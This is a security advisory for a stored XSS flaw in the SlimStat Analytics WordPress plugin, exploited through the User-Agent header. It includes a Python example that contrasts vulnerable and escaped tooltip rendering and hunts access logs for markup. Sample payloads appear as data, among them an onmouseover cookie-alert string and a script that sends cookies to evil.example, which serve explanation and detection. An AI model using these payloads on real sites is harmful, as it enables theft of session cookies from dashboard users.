Impact
The SlimStat Analytics plugin for WordPress contains a stored cross‑site scripting (XSS) vulnerability whose injection point is the User‑Agent HTTP header. The plugin does not sufficiently sanitize the header value when it records a visit and, when the ‘show_complete_user_agent_tooltip’ option is enabled, does not escape that value on output. An unauthenticated attacker therefore only needs to send a request whose User‑Agent string carries JavaScript: the value is written to the database and later rendered in the reports interface, where it executes in the browser of whoever views the report. Since the reports are viewed by logged‑in users of the WordPress dashboard, the script runs inside an authenticated session and can steal session cookies, deface the site, or mount phishing attacks against every user who opens a page that renders the stored value.
Affected Systems
All versions of the SlimStat Analytics plugin by veronalabs up to and including 5.4.11 are affected. The issue is reachable only when the plugin option ‘show_complete_user_agent_tooltip’ is enabled; it is disabled by default, so a site on the default configuration is not exposed even on a vulnerable version. Because the header value is stored regardless of this setting, any payload already recorded would render as soon as the option is turned on. The vulnerability is confined to sites running the plugin and does not affect WordPress core.
Risk and Exploitability
The CVSS base score of 7.2 places the flaw in the high‑severity band. No EPSS score is available, and the vulnerability is not listed in the CISA KEV catalog; absence from KEV means only that no confirmed in‑the‑wild exploitation has been catalogued, not that the flaw is unexploited. Exploitation requires a victim to open a page that renders the stored User‑Agent value while the tooltip option is enabled, so the exposed population is the users who browse the plugin’s report pages, and the payload executes with whatever privileges those users hold. The attacker needs no account: a single HTTP request with a crafted User‑Agent header plants the payload, and because the payload is stored it fires for every viewer of the affected page until the offending record is removed. No public exploit tool is known, but none is needed; setting an arbitrary User‑Agent header is a one‑line task with any HTTP client, so the lack of tooling should not be read as a barrier.
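The mechanism described under Impact and the exposure described in this section, as an added example that is not SlimStat's or WordPress's code: a hypothetical tooltip renderer in its unescaped and escaped forms, a parser that shows which attributes a browser would actually apply to each rendering, and a coarse hunt over access‑log lines for User‑Agent values that carry markup. The option name is used only as a dictionary key, and the User‑Agent strings and Apache‑style log lines are constructed for this example.

```python
"""Added example, not code from SlimStat or WordPress: shows why an unescaped
User-Agent becomes stored XSS when the tooltip option is on, what output
escaping changes, and a coarse hunt for User-Agent values carrying markup in
access logs. TOOLTIP_OPTION, the render functions and the log lines are
constructed for this example."""
import re
from html import escape
from html.parser import HTMLParser

# Stand-in for the plugin setting named in the advisory; used here as a dict key.
TOOLTIP_OPTION = "show_complete_user_agent_tooltip"

# Constructed User-Agent values as a plugin would store them, verbatim from
# the request header. The first one closes the title attribute and adds an
# event handler; nothing in it is sanitized at storage time.
MALICIOUS_UA = 'Mozilla/5.0" onmouseover="alert(document.cookie)'
BENIGN_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"


def render_tooltip_vulnerable(user_agent: str, options: dict) -> str:
    """Vulnerable pattern: stored header interpolated into an attribute with
    no output escaping. Only reachable when the tooltip option is enabled."""
    if not options.get(TOOLTIP_OPTION):
        return "<span>visitor</span>"
    return f'<span title="{user_agent}">visitor</span>'


def render_tooltip_fixed(user_agent: str, options: dict) -> str:
    """Hardened form: escape on output. With quote=True a double quote becomes
    &quot;, so the value can never terminate the attribute. In WordPress the
    equivalent call is esc_attr()."""
    if not options.get(TOOLTIP_OPTION):
        return "<span>visitor</span>"
    return f'<span title="{escape(user_agent, quote=True)}">visitor</span>'


class _AttrCollector(HTMLParser):
    """Collects start-tag attributes the way a browser's tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: list = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)


def span_attributes(rendered: str) -> dict:
    """Parse rendered markup and return the attributes the browser would apply.
    An 'onmouseover' key here means the payload became an event handler."""
    parser = _AttrCollector()
    parser.feed(rendered)
    return dict(parser.attrs)


# Constructed Apache combined-format log lines. Apache writes a literal quote
# inside a header as \" ; the third and fourth lines carry attacker-style
# User-Agents, the first two are ordinary browsers.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [01/Jan/2025:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"',
    '203.0.113.11 - - [01/Jan/2025:10:00:01 +0000] "GET /blog/ HTTP/1.1" 200 2048 "-" '
    '"Mozilla/5.0 (Windows NT 10.0) Chrome/120.0"',
    '198.51.100.7 - - [01/Jan/2025:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    r'"Mozilla/5.0\" onmouseover=\"alert(1)"',
    '198.51.100.8 - - [01/Jan/2025:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    "\"<script>fetch('https://evil.example/?c='+document.cookie)</script>\"",
]

# Last quoted field on the line, allowing backslash-escaped characters inside.
UA_FIELD = re.compile(r'"((?:[^"\\]|\\.)*)"\s*$')
# Coarse indicators of markup in a header that should only ever be plain text:
# a tag opener, an on*= event-handler attribute, or a javascript: URL.
MARKUP_INDICATORS = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def user_agent_from_log_line(line: str) -> str:
    """Extract and unescape the User-Agent field of a combined-format log line."""
    match = UA_FIELD.search(line)
    return match.group(1).replace('\\"', '"') if match else ""


def suspicious_user_agents(lines) -> list:
    """Return (client_ip, user_agent) for lines whose User-Agent carries markup."""
    hits = []
    for line in lines:
        ua = user_agent_from_log_line(line)
        if MARKUP_INDICATORS.search(ua):
            hits.append((line.split(" ", 1)[0], ua))
    return hits


if __name__ == "__main__":
    enabled = {TOOLTIP_OPTION: True}
    print("vulnerable:", span_attributes(render_tooltip_vulnerable(MALICIOUS_UA, enabled)))
    print("fixed:     ", span_attributes(render_tooltip_fixed(MALICIOUS_UA, enabled)))
    for ip, ua in suspicious_user_agents(SAMPLE_LOG_LINES):
        print(f"suspicious User-Agent from {ip}: {ua!r}")
```

Running the block shows the vulnerable rendering acquiring an `onmouseover` attribute while the escaped rendering keeps the whole string inside `title`, which is the difference between a tooltip and an executing event handler. The log check is deliberately coarse: it is a hunting heuristic for requests that may have planted a payload, not a replacement for upgrading the plugin or disabling the tooltip option, and any hit should be followed by inspecting the stored User‑Agent values in the plugin's tables for the same markers.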
OpenCVE Enrichment